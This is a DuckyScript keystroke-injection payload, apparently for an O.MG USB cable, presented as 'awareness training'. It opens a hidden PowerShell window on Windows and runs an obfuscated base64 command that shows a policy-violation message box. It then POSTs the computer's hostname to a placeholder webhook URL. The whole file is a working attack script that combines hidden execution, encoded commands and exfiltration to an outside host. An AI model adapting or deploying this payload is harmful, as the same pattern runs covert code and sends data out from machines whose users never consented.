REM       OMG-AwarenessTraining
REM       Version 1.1
REM       OS: Windows 
REM       Author: 0i41E

REM       A small message box, telling the user that he violated the security policy. The hostname of the user will be send to a webhook to report the incident
REM       Fill in the (Web)hook URL, in LINE 31, where the hostname should be reported to.

DELAY 500
DUCKY_LANG de
DELAY 1500
GUI r
DELAY 500
STRING powershell -NoP -NonI -W hidden
DELAY 500
ENTER

DELAY 200
STRING powershell.exe -enc JABtAD0AIgBZAG8AdQAgAGgAYQB2AGUAIAB2AGkAbwBsAGEAdABlAGQAIAB0AGgAZQAgAFUAUwBCACAAUwBlAGMAdQByAGkAdA
DELAY 200
STRING B5ACAAUABvAGwAaQBjAHkALgAgAFQAaABpAHMAIABpAG4AYwBpAGQAZQBuAHQAIAB3AGkAbABsACAAYgBlACAAcgBlAHAAbwByAHQAZQBkACEAIgA7AA0A
DELAY 200
STRING CgBbAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkAFcAaQB0AGgAUABhAHIAdABpAG
DELAY 200
STRING EAbABOAGEAbQBlACgAIgBTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMAIgApADsAWwBTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3
DELAY 200
STRING AHMALgBGAG8AcgBtAHMALgBNAGUAcwBzAGEAZwBlAEIAbwB4AF0AOgA6AFMAaABvAHcAKAAkAG0ALAAiAFQAaQB0AGUAbAAiACwAMAAsAFsAUwB5AHMAdA
DELAY 200
STRING BlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzAC4ATQBlAHMAcwBhAGcAZQBCAG8AeABJAGMAbwBuAF0AOgA6AEUAeABjAGwAYQBtAGEAdABpAG8A
DELAY 200
STRING bgApAA==;echo $env:COMPUTERNAME| Iwr -Uri "WEB-HOOK-URL" -Method POST
DELAY 200
ENTER